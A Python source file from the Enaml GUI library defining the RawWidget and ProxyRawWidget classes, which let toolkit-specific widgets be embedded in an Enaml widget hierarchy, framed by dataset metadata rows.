| gpl-3.0 | -908,742,521,821,812,900 | 41.170279 | 79 | 0.532046 | false |
ContinuumIO/ashiba | enaml/enaml/widgets/raw_widget.py | 1 | 2000 | #------------------------------------------------------------------------------
# Copyright (c) 2013, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#------------------------------------------------------------------------------
from atom.api import Typed, ForwardTyped
from .control import Control, ProxyControl
class ProxyRawWidget(ProxyControl):
""" The abstract definition of a proxy RawWidget object.
"""
#: A reference to the RawWidget declaration.
declaration = ForwardTyped(lambda: RawWidget)
def get_widget(self):
raise NotImplementedError
class RawWidget(Control):
""" A raw toolkit-specific control.
Use this widget when the toolkit backend for the application is
known ahead of time, and Enaml does provide an implementation of
the required widget. This can be used as a hook to inject custom
widgets into an Enaml widget hierarchy.
"""
#: A reference to the proxy Control object.
proxy = Typed(ProxyRawWidget)
def create_widget(self, parent):
""" Create the toolkit widget for the control.
This method should create and initialize the widget.
Parameters
----------
parent : toolkit widget or None
The parent toolkit widget for the control.
Returns
-------
result : toolkit widget
The toolkit specific widget for the control.
"""
raise NotImplementedError
def get_widget(self):
""" Retrieve the toolkit widget for the control.
Returns
-------
result : toolkit widget or None
The toolkit widget that was previously created by the
call to 'create_widget' or None if the proxy is not
active or the widget has been destroyed.
"""
if self.proxy_is_active:
return self.proxy.get_widget()
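# Hedged sketch (an addition, not from the upstream module): a concrete
# subclass typically overrides create_widget() to build and return the
# toolkit widget, e.g. assuming a Qt4-based backend:
#
#     class MyLabel(RawWidget):
#
#         def create_widget(self, parent):
#             from PyQt4.QtGui import QLabel  # assumption: Qt4 backend
#             return QLabel('hello', parent)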
| bsd-3-clause | -7,873,307,924,841,414,000 | 29.30303 | 79 | 0.6015 | false |